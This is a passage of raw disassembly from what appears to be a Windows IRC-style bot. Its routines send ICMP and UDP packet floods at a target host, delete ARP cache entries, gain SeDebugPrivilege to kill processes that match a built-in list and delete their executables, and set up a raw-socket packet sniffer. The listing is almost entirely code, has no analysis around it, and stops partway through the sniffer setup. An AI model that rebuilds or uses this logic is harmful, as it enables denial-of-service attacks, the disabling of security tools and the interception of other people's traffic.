jnz short locret_4087A6
push [esp+arg_0]
call dword_43A420 ; gethostbyname
test eax, eax
jnz short loc_40879F
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40879F: ; CODE XREF: sub_40877E+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_4087A6: ; CODE XREF: sub_40877E+D�j
retn
sub_40877E endp
; =============== S U B R O U T I N E =======================================
sub_4087A7 proc near ; CODE XREF: sub_4096E9+138�p
mov ecx, dword_43A4A8
xor eax, eax
test ecx, ecx
jz short locret_4087B5
jmp ecx
; ---------------------------------------------------------------------------
locret_4087B5: ; CODE XREF: sub_4087A7+A�j
retn
sub_4087A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_4087B6 proc near ; CODE XREF: sub_409848:loc_40E43D�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 88h
push ebx
push esi
xor eax, eax
push edi
inc eax
push eax
mov [ebp+78h+var_4], eax
lea eax, [ebp+78h+var_8]
xor ebx, ebx
push eax
push ebx
xor esi, esi
mov [ebp+78h+var_8], ebx
call dword_43A3C8 ; GetIpNetTable
mov ecx, eax
sub ecx, ebx
jz short loc_408846
sub ecx, 32h
jz loc_40888D
sub ecx, 48h
jz short loc_408811
sub ecx, 6Eh
jz short loc_40880A
loc_4087F6: ; CODE XREF: sub_4087B6+8E�j
push eax
lea eax, [ebp+78h+var_88]
push offset aFlushdnsErrorG ; "[FLUSHDNS]: Error getting ARP cache: <%"...
push eax
call sub_416975
add esp, 0Ch
jmp short loc_40886E
; ---------------------------------------------------------------------------
loc_40880A: ; CODE XREF: sub_4087B6+3E�j
push offset aFlushdnsArpCac ; "[FLUSHDNS]: ARP cache is empty."
jmp short loc_408863
; ---------------------------------------------------------------------------
loc_408811: ; CODE XREF: sub_4087B6+39�j
push [ebp+78h+var_8]
call sub_416E1F
pop ecx
mov ecx, [ebp+78h+var_8]
mov edx, ecx
mov esi, eax
shr ecx, 2
xor eax, eax
mov edi, esi
rep stosd
mov ecx, edx
and ecx, 3
cmp esi, ebx
rep stosb
jz short loc_40885E
push 1
lea eax, [ebp+78h+var_8]
push eax
push esi
call dword_43A3C8 ; GetIpNetTable
cmp eax, ebx
jnz short loc_4087F6
loc_408846: ; CODE XREF: sub_4087B6+2B�j
cmp [esi], ebx
jbe short loc_40887B
lea edi, [esi+4]
loc_40884D: ; CODE XREF: sub_4087B6+A4�j
push edi
call dword_43A42C ; DeleteIpNetEntry
inc ebx
add edi, 18h
cmp ebx, [esi]
jb short loc_40884D
jmp short loc_40887B
; ---------------------------------------------------------------------------
loc_40885E: ; CODE XREF: sub_4087B6+7D�j
push offset aFlushdnsUnable ; "[FLUSHDNS]: Unable to allocation ARP ca"...
loc_408863: ; CODE XREF: sub_4087B6+59�j
; sub_4087B6+DC�j
lea eax, [ebp+78h+var_88]
push eax
call sub_416975
pop ecx
pop ecx
loc_40886E: ; CODE XREF: sub_4087B6+52�j
lea eax, [ebp+78h+var_88]
push eax
mov [ebp+78h+var_4], ebx
call sub_401F0F
pop ecx
loc_40887B: ; CODE XREF: sub_4087B6+92�j
; sub_4087B6+A6�j
push esi
call sub_416D07
mov eax, [ebp+78h+var_4]
pop ecx
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
; ---------------------------------------------------------------------------
loc_40888D: ; CODE XREF: sub_4087B6+30�j
push offset aFlushdnsNotSup ; "[FLUSHDNS]: Not supported by this syste"...
jmp short loc_408863
sub_4087B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408894 proc near ; CODE XREF: sub_401141+215�p
; sub_401141+321�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
mov [ebp+var_4], 10h
call dword_43A328 ; getsockname
movzx eax, [ebp+var_D]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
mov esi, offset dword_43B050
push esi
call sub_416975
add esp, 18h
pop edi
mov eax, esi
pop esi
leave
retn
sub_408894 endp
; =============== S U B R O U T I N E =======================================
sub_4088EA proc near ; CODE XREF: sub_402858+249�p
; sub_402858+274�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_408915
lea eax, [ecx-2]
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+4+arg_0]
push edi
loc_408908: ; CODE XREF: sub_4088EA+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_408908
pop edi
jmp short loc_408919
; ---------------------------------------------------------------------------
loc_408915: ; CODE XREF: sub_4088EA+A�j
mov esi, [esp+4+arg_0]
loc_408919: ; CODE XREF: sub_4088EA+29�j
test ecx, ecx
jz short loc_408922
movzx eax, byte ptr [esi]
add edx, eax
loc_408922: ; CODE XREF: sub_4088EA+31�j
mov ecx, edx
shr ecx, 10h
and edx, 0FFFFh
add ecx, edx
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
pop esi
retn
sub_4088EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40893A proc near ; DATA XREF: sub_409848+5ABC�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_416B90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
pop ecx
mov esi, eax
xor ebx, ebx
lea edi, [ebp+var_144]
rep movsd
inc ebx
mov [eax+120h], ebx
call dword_43A410 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_43A434 ; inet_addr
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_408993
lea eax, [ebp+var_C0]
push eax
call dword_43A420 ; gethostbyname
test eax, eax
jz short loc_408999
loc_408993: ; CODE XREF: sub_40893A+46�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_4089F7
loc_408999: ; CODE XREF: sub_40893A+57�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingErrorSendi ; "[PING]: Error sending pings to %s."
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+var_28], 0
jnz short loc_4089DB
push 0
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_405D62
add esp, 14h
loc_4089DB: ; CODE XREF: sub_40893A+7E�j
lea eax, [ebp+var_344]
push eax
call sub_401F0F
push [ebp+var_30]
call sub_4139F6
pop ecx
pop ecx
push ebx
jmp loc_408ABC
; ---------------------------------------------------------------------------
loc_4089F7: ; CODE XREF: sub_40893A+5D�j
test eax, eax
jz short loc_408A07
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_408A0A
; ---------------------------------------------------------------------------
loc_408A07: ; CODE XREF: sub_40893A+BF�j
mov [ebp+var_4], esi
loc_408A0A: ; CODE XREF: sub_40893A+CB�j
push 7
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
cmp [ebp+var_3C], eax
jle short loc_408A25
mov [ebp+var_3C], eax
loc_408A25: ; CODE XREF: sub_40893A+E6�j
cmp [ebp+var_38], ebx
jge short loc_408A2D
mov [ebp+var_38], ebx
loc_408A2D: ; CODE XREF: sub_40893A+EE�j
xor edi, edi
xor esi, esi
cmp [ebp+var_40], edi
jle short loc_408A5C
loc_408A36: ; CODE XREF: sub_40893A+120�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push edi
push [ebp+var_3C]
lea eax, [ebp+var_10320]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_43A4AC ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_408A36
loc_408A5C: ; CODE XREF: sub_40893A+FA�j
push [ebp+arg_0]
call dword_43A444 ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingFinishedSe ; "[PING]: Finished sending pings to %s."
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+var_28], edi
jnz short loc_408AA5
push edi
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_405D62
add esp, 14h
loc_408AA5: ; CODE XREF: sub_40893A+149�j
lea eax, [ebp+var_344]
push eax
call sub_401F0F
push [ebp+var_30]
call sub_4139F6
pop ecx
pop ecx
push edi
loc_408ABC: ; CODE XREF: sub_40893A+B8�j
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_40893A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AC3 proc near ; DATA XREF: sub_409848+5C0C�o
var_10316 = byte ptr -10316h
var_10314 = byte ptr -10314h
var_338 = byte ptr -338h
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10314h
call sub_416B90
mov eax, [ebp+arg_0]
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+var_138]
rep movsd
xor esi, esi
inc esi
mov [eax+120h], esi
call dword_422004 ; GetTickCount
push eax
call sub_416B24
pop ecx
push 11h
push 2
push 2
call dword_43A3BC ; socket
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_B4]
push eax
mov [ebp+var_14], 2
call dword_43A434 ; inet_addr
xor edi, edi
xor ecx, ecx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_408B9E
lea eax, [ebp+var_B4]
push eax
call dword_43A420 ; gethostbyname
mov ecx, eax
cmp ecx, edi
jnz short loc_408B9E
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpErrorSendin ; "[UDP]: Error sending pings to %s."
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_408B82
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_405D62
add esp, 14h
loc_408B82: ; CODE XREF: sub_408AC3+9D�j
lea eax, [ebp+var_338]
push eax
call sub_401F0F
push [ebp+var_24]
call sub_4139F6
pop ecx
pop ecx
push esi
jmp loc_408CD7
; ---------------------------------------------------------------------------
loc_408B9E: ; CODE XREF: sub_408AC3+6A�j
; sub_408AC3+7D�j
cmp [ebp+var_28], edi
jge short loc_408BA6
mov [ebp+var_28], edi
loc_408BA6: ; CODE XREF: sub_408AC3+DE�j
mov eax, 0FFFFh
cmp [ebp+var_28], eax
jle short loc_408BB3
mov [ebp+var_28], eax
loc_408BB3: ; CODE XREF: sub_408AC3+EB�j
cmp ecx, edi
jz short loc_408BBE
mov eax, [ecx+0Ch]
mov eax, [eax]
jmp short loc_408BC1
; ---------------------------------------------------------------------------
loc_408BBE: ; CODE XREF: sub_408AC3+F2�j
lea eax, [ebp+arg_0]
loc_408BC1: ; CODE XREF: sub_408AC3+F9�j
cmp [ebp+var_28], edi
mov eax, [eax]
mov [ebp+var_10], eax
jnz short loc_408BDC
call sub_416B31
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_408BDF
; ---------------------------------------------------------------------------
loc_408BDC: ; CODE XREF: sub_408AC3+106�j
push [ebp+var_28]
loc_408BDF: ; CODE XREF: sub_408AC3+117�j
call dword_43A514 ; ntohs
mov [ebp+var_12], ax
mov eax, [ebp+var_34]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_2C], edi
mov [ebp+var_34], eax
jnz short loc_408BFD
mov [ebp+var_2C], esi
loc_408BFD: ; CODE XREF: sub_408AC3+135�j
xor esi, esi
cmp [ebp+var_30], edi
jle short loc_408C78
loc_408C04: ; CODE XREF: sub_408AC3+159�j
call sub_416B31
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_30]
mov [ebp+esi-10315h], dl
jl short loc_408C04
jmp short loc_408C78
; ---------------------------------------------------------------------------
loc_408C20: ; CODE XREF: sub_408AC3+1B8�j
dec [ebp+var_34]
push 0Bh
pop esi
loc_408C26: ; CODE XREF: sub_408AC3+195�j
push 10h
lea eax, [ebp+var_14]
push eax
push edi
call sub_416B31
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_30]
sub eax, edx
push eax
lea eax, [ebp+var_10314]
push eax
push [ebp+var_4]
call dword_43A38C ; sendto
push [ebp+var_2C]
call dword_422000 ; Sleep
dec esi
jnz short loc_408C26
cmp [ebp+var_28], edi
jnz short loc_408C78
call sub_416B31
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_43A514 ; ntohs
mov [ebp+var_12], ax
loc_408C78: ; CODE XREF: sub_408AC3+13F�j
; sub_408AC3+15B�j ...
cmp [ebp+var_34], edi
jg short loc_408C20
dec [ebp+var_34]
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpFinishedSen ; "[UDP]: Finished sending packets to %s."
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_408CC0
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_405D62
add esp, 14h
loc_408CC0: ; CODE XREF: sub_408AC3+1DB�j
lea eax, [ebp+var_338]
push eax
call sub_401F0F
push [ebp+var_24]
call sub_4139F6
pop ecx
pop ecx
push edi
loc_408CD7: ; CODE XREF: sub_408AC3+D6�j
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_408AC3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408CDE proc near ; CODE XREF: sub_403E31+45�p
; sub_403E31+165�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call dword_4220E0 ; GetCurrentProcess
push eax
call dword_43A4FC ; OpenProcessToken
test eax, eax
jnz short loc_408CFD
leave
retn
; ---------------------------------------------------------------------------
loc_408CFD: ; CODE XREF: sub_408CDE+1B�j
push esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
xor esi, esi
push esi
call dword_43A4E0 ; LookupPrivilegeValueA
test eax, eax
jz short loc_408D3B
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_408D24
or [ebp+var_8], 2
jmp short loc_408D28
; ---------------------------------------------------------------------------
loc_408D24: ; CODE XREF: sub_408CDE+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_408D28: ; CODE XREF: sub_408CDE+44�j
push esi
push esi
push esi
lea eax, [ebp+var_14]
push eax
push esi
push [ebp+var_4]
call dword_43A428 ; AdjustTokenPrivileges
mov esi, eax
loc_408D3B: ; CODE XREF: sub_408CDE+32�j
push [ebp+var_4]
call dword_42202C ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_408CDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408D49 proc near ; CODE XREF: sub_40905C+68�p
; sub_40915E+C�p ...
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
xor ebx, ebx
push 49h
xor eax, eax
cmp dword_43A3AC, ebx
pop ecx
lea edi, [ebp+var_128]
mov [ebp+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_34C]
mov [ebp+var_350], ebx
rep stosd
jz loc_408F5A
cmp dword_43A40C, ebx
jz loc_408F5A
cmp dword_43A364, ebx
jz loc_408F5A
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_408CDE
pop ecx
pop ecx
push ebx
push 0Fh
call dword_43A3AC ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_408F4D
lea eax, [ebp+var_12C]
push eax
push edi
mov [ebp+var_12C], 128h
call dword_43A40C ; Process32First
test eax, eax
mov esi, dword_42202C
jz loc_408F48
lea eax, [ebp+var_12C]
push eax
push edi
call dword_43A364 ; Process32Next
test eax, eax
jz loc_408F48
mov ebx, dword_422078
loc_408E08: ; CODE XREF: sub_408D49+1F7�j
cmp [ebp+arg_10], 0
jz short loc_408E69
xor edi, edi
loc_408E10: ; CODE XREF: sub_408D49+E7�j
push off_42ED68[edi]
lea eax, [ebp+var_108]
push eax
call dword_4220EC ; lstrcmpiA
test eax, eax
jz short loc_408E37
add edi, 4
cmp edi, 9E0h
jb short loc_408E10
jmp loc_408F2E
; ---------------------------------------------------------------------------
loc_408E37: ; CODE XREF: sub_408D49+DC�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
mov edi, eax
test edi, edi
jz loc_408F2E
push 0
push edi
call dword_4220E8 ; TerminateProcess
test eax, eax
jnz loc_408F2E
loc_408E61: ; CODE XREF: sub_408D49+1AF�j
push edi
call esi ; CloseHandle
jmp loc_408F2E
; ---------------------------------------------------------------------------
loc_408E69: ; CODE XREF: sub_408D49+C3�j
mov edi, [ebp+arg_C]
test edi, edi
jnz loc_408EFD
cmp [ebp+arg_4], edi
jz loc_408F2E
push [ebp+var_124]
push 8
call dword_43A3AC ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov edi, eax
mov [ebp+var_350], 224h
jz short loc_408EBD
lea eax, [ebp+var_350]
push eax
push edi
call dword_43A3D4 ; Module32First
test eax, eax
push [ebp+var_124]
jz short loc_408EC3
lea eax, [ebp+var_230]
jmp short loc_408EC9
; ---------------------------------------------------------------------------
loc_408EBD: ; CODE XREF: sub_408D49+152�j
push [ebp+var_124]
loc_408EC3: ; CODE XREF: sub_408D49+16A�j
lea eax, [ebp+var_108]
loc_408EC9: ; CODE XREF: sub_408D49+172�j
push eax
lea eax, [ebp+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_416975
add esp, 10h
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
jmp loc_408E61
; ---------------------------------------------------------------------------
loc_408EFD: ; CODE XREF: sub_408D49+125�j
lea eax, [ebp+var_108]
loc_408F03: ; CODE XREF: sub_408D49+1D6�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_408F25
test cl, cl
jz short loc_408F21
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_408F25
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_408F03
loc_408F21: ; CODE XREF: sub_408D49+1C4�j
xor eax, eax
jmp short loc_408F2A
; ---------------------------------------------------------------------------
loc_408F25: ; CODE XREF: sub_408D49+1C0�j
; sub_408D49+1CE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408F2A: ; CODE XREF: sub_408D49+1DA�j
test eax, eax
jz short loc_408F61
loc_408F2E: ; CODE XREF: sub_408D49+E9�j
; sub_408D49+101�j ...
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call dword_43A364 ; Process32Next
test eax, eax
jnz loc_408E08
xor ebx, ebx
loc_408F48: ; CODE XREF: sub_408D49+9D�j
; sub_408D49+B3�j
push [ebp+var_4]
call esi ; CloseHandle
loc_408F4D: ; CODE XREF: sub_408D49+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_408CDE
pop ecx
pop ecx
loc_408F5A: ; CODE XREF: sub_408D49+3A�j
; sub_408D49+46�j ...
xor eax, eax
loc_408F5C: ; CODE XREF: sub_408D49+30E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_408F61: ; CODE XREF: sub_408D49+1E3�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
push [ebp+var_124]
mov edi, eax
push 8
call dword_43A3AC ; CreateToolhelp32Snapshot
push [ebp+var_4]
mov ebx, eax
mov [ebp+var_350], 224h
call esi ; CloseHandle
push 0
push edi
call dword_4220E8 ; TerminateProcess
test eax, eax
jnz short loc_408FA6
push edi
call esi ; CloseHandle
push ebx
call esi ; CloseHandle
jmp short loc_408F5A
; ---------------------------------------------------------------------------
loc_408FA6: ; CODE XREF: sub_408D49+253�j
cmp [ebp+arg_18], 0
jz loc_409054
lea eax, [ebp+var_350]
push eax
push ebx
call dword_43A3D4 ; Module32First
test eax, eax
jz short loc_409019
push ebx
call esi ; CloseHandle
xor esi, esi
loc_408FC7: ; CODE XREF: sub_408D49+2B2�j
push 7D0h
call dword_422000 ; Sleep
push 20h
lea eax, [ebp+var_230]
push eax
inc esi
call dword_4220CC ; SetFileAttributesA
lea eax, [ebp+var_230]
push eax
call dword_4220E4 ; DeleteFileA
test eax, eax
setnz al
test al, al
jnz short loc_40900B
cmp esi, 5
jl short loc_408FC7
lea eax, [ebp+var_230]
push eax
push offset aCouldNotDelete ; "Could not delete '%s'.!\n"
jmp short loc_409025
; ---------------------------------------------------------------------------
loc_40900B: ; CODE XREF: sub_408D49+2AD�j
lea eax, [ebp+var_230]
push eax
push offset aFileDeletedS_ ; "[FILE]: Deleted '%s'.\n"
jmp short loc_409025
; ---------------------------------------------------------------------------
loc_409019: ; CODE XREF: sub_408D49+277�j
lea eax, [ebp+var_108]
push eax
push offset aCannotExtractP ; "Cannot extract process path for %s\n"
loc_409025: ; CODE XREF: sub_408D49+2C0�j
; sub_408D49+2CE�j
lea eax, [ebp+var_550]
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_409054
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_409054: ; CODE XREF: sub_408D49+261�j
; sub_408D49+2EF�j
xor eax, eax
inc eax
jmp loc_408F5C
sub_408D49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40905C proc near ; DATA XREF: sub_409848+4E2E�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 298h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+74h+var_298]
push offset aProcListingPro ; "[PROC]: Listing processes:"
push eax
call sub_416975
xor esi, esi
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_4090B4
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_405D62
add esp, 14h
loc_4090B4: ; CODE XREF: sub_40905C+3C�j
push esi
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_94]
push esi
push esi
push [ebp+74h+var_C]
push eax
push [ebp+74h+var_98]
call sub_408D49
add esp, 1Ch
test eax, eax
lea eax, [ebp+74h+var_298]
jnz short loc_4090DD
push offset aProcProcessLis ; "[PROC]: Process list completed."
jmp short loc_4090E2
; ---------------------------------------------------------------------------
loc_4090DD: ; CODE XREF: sub_40905C+78�j
push offset aProcProcessL_0 ; "[PROC]: Process list failed."
loc_4090E2: ; CODE XREF: sub_40905C+7F�j
push eax
call sub_416975
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_409109
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_405D62
add esp, 14h
loc_409109: ; CODE XREF: sub_40905C+91�j
lea eax, [ebp+74h+var_298]
push eax
call sub_401F0F
push [ebp+74h+var_14]
call sub_4139F6
pop ecx
pop ecx
push esi
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_40905C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_409127 proc near ; CODE XREF: sub_409848+3F97�p
; sub_41381B+4D�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
push 0
push 1F0FFFh
inc edi
call dword_422078 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_409159
push 0
push esi
call dword_4220E8 ; TerminateProcess
test eax, eax
jnz short loc_409159
push esi
xor edi, edi
call dword_42202C ; CloseHandle
loc_409159: ; CODE XREF: sub_409127+1A�j
; sub_409127+27�j
mov eax, edi
pop edi
pop esi
retn
sub_409127 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40915E proc near ; DATA XREF: sub_409848+21F6�o
push esi
xor esi, esi
loc_409161: ; CODE XREF: sub_40915E+20�j
push esi
push 1
push 1
push esi
push esi
push esi
push esi
call sub_408D49
add esp, 1Ch
push dword_42ED60
call dword_422000 ; Sleep
jmp short loc_409161
sub_40915E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_409180 proc near ; DATA XREF: sub_409848+1C6A�o
var_102B4 = byte ptr -102B4h
var_102AC = byte ptr -102ACh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov eax, 102B4h
lea ebp, [esp-74h]
call sub_416B90
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
xor eax, eax
inc eax
push 25h
pop ecx
mov [ebp+74h+var_8], eax
mov esi, edx
lea edi, [ebp+74h+var_B4]
rep movsd
mov [edx+90h], eax
xor eax, eax
lea edi, [ebp+74h+var_1C]
stosd
stosd
stosd
xor esi, esi
stosd
push esi
mov [ebp+74h+var_1C], 2
call dword_43A514 ; ntohs
push [ebp+74h+var_B4]
mov [ebp+74h+var_1A], ax
call sub_408894
pop ecx
push eax
call dword_43A434 ; inet_addr
push esi
push 3
push 2
mov [ebp+74h+var_18], eax
call dword_43A3BC ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+74h+var_4], edi
jnz short loc_409243
call dword_43A47C ; WSAGetLastError
push eax
lea eax, [ebp+74h+var_2B4]
push offset aPsniffErrorSoc ; "[PSNIFF]: Error: socket() failed, retur"...
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+74h+var_28], esi
jnz short loc_409229
push esi
push [ebp+74h+var_2C]
lea eax, [ebp+74h+var_2B4]
push eax
lea eax, [ebp+74h+var_B0]
push eax
push [ebp+74h+var_B4]
call sub_405D62
add esp, 14h
loc_409229: ; CODE XREF: sub_409180+8D�j
lea eax, [ebp+74h+var_2B4]
push eax
call sub_401F0F
push [ebp+74h+var_30]
call sub_4139F6
pop ecx
jmp loc_409464
; ---------------------------------------------------------------------------
loc_409243: ; CODE XREF: sub_409180+6D�j
mov eax, [ebp+74h+var_30]
imul eax, 234h
mov dword_43B26C[eax], edi
push 10h
lea eax, [ebp+74h+var_1C]
push eax
push edi
call dword_43A49C ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4092B1
call dword_43A47C ; WSAGetLastError
push eax
lea eax, [ebp+74h+var_2B4]
push offset aPsniffErrorBin ; "[PSNIFF]: Error: bind() failed, returne"...
push eax
call sub_416975
add esp, 0Ch
